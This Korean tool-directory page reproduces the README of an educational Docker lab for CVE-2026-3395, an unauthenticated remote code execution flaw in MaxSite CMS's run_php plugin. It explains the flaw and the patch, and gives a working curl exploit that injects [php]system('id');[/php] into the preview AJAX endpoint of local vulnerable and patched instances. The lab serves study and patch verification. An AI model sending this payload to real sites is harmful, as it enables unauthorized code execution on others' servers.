Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/rootdirective-sec/cve-2026-3395-lab
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubrootdirective-sec/cve-2026-3395-lab

CVE-2026-3395-Lab

교육용 Docker 랩으로, MaxSite CMS의 run_php 플러그인을 통한 인증 없는 RCE 취약점인 CVE-2026-3395를 시연합니다. 취약한 환경과 패치된 환경을 모두 제공하여 안전한 재현 및 분석이 가능합니다.

저장소 보기
15개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-3395 — MaxSite CMS 인증 없는 RCE 실습 환경

이 저장소는 교육 및 연구 목적으로만 제공됩니다. 모든 테스트는 로컬 Docker 실습 환경에서만 수행해야 합니다. 이 구성을 공개 또는 운영 환경에 배포하지 마십시오.


요약

CVE-2026-3395는 MaxSite CMS에 영향을 미치며 인증 없이 관리자 AJAX 엔드포인트에 접근할 수 있게 합니다. run_php 플러그인이 활성화되면 CMS 훅 시스템을 통해 사용자 입력이 PHP 코드로 평가될 수 있으며, 이로 인해 원격 코드 실행(RCE)이 발생할 수 있습니다.

이 저장소에는 다음이 포함됩니다:

  • 취약한 빌드(패치 이전 커밋)
  • 패치된 빌드(수정 이후 커밋)
  • 재현을 위한 Docker 실습 환경
  • 안전한 영향 증명 데모

취약점 개요

취약한 엔드포인트는 다음 위치에 있습니다:

root@kitploit:~
application/maxsite/admin/plugins/editor_markitup/preview-ajax.php

취약한 버전에서:

  • 엔드포인트는 인증 없이 접근할 수 있습니다
  • 사용자 입력(POST data)은 mso_hook()을 통해 전달됩니다
  • run_php 플러그인은 [php]...[/php] 블록을 처리합니다
  • 플러그인은 eval()을 사용하여 포함된 코드를 평가합니다

run_php가 활성화되면 인증 없는 원격 코드 실행이 발생합니다.

패치된 버전은 다음을 추가합니다:

root@kitploit:~
if (!is_login()) die('no login');
mso_checkreferer();

이로 인해 인증된 사용자만 접근할 수 있게 제한됩니다.


Docker 실습 환경 설정

이 실습 환경은 두 가지 환경을 구축합니다:

환경포트
취약 버전8081
패치 버전8082

요구 사항

  • Docker
  • Docker Compose v2

1. 빌드 및 시작

root@kitploit:~
docker compose up -d --build

이 명령은:

  • 두 이미지를 빌드합니다
  • 데이터베이스를 시작합니다
  • CMS 설치 프로그램을 자동으로 실행합니다
  • 실습 환경 구성에서 run_php를 활성화합니다

2. 설치 확인

브라우저에서 다음을 엽니다:

root@kitploit:~
http://localhost:8081  (취약 버전)
http://localhost:8082  (패치 버전)

두 인스턴스 모두 정상적으로 로드되어야 합니다.

Lab Running


취약점 증명 (실습 환경 전용)

AJAX 라우트는 base64로 인코딩된 경로를 사용합니다.

다음의 Base64:

root@kitploit:~
admin/plugins/editor_markitup/preview-ajax.php

는 다음과 같습니다:

root@kitploit:~
YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==

취약 버전 인스턴스 테스트

root@kitploit:~
curl -X POST "http://localhost:8081/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8081/" \
  --data-urlencode "data=[php]system('id');[/php]"

Vulnerable RCE Output


패치 버전 인스턴스 테스트

root@kitploit:~
curl -X POST "http://localhost:8082/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8082/" \
  --data-urlencode "data=[php]system('id');[/php]"

예상 결과:

root@kitploit:~
no login

Patched Access Control


실습 환경 중지

컨테이너를 중지하려면:

root@kitploit:~
docker compose down -v

면책 조항

이 프로젝트는 연구 및 학습 목적으로만 격리된 환경에서 사용하십시오.


참고 자료

  • 공개 분석 문서: https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE/
  • VulDB 항목: https://vuldb.com/?submit.762169
  • 공식 패치 커밋: https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
도구 다운로드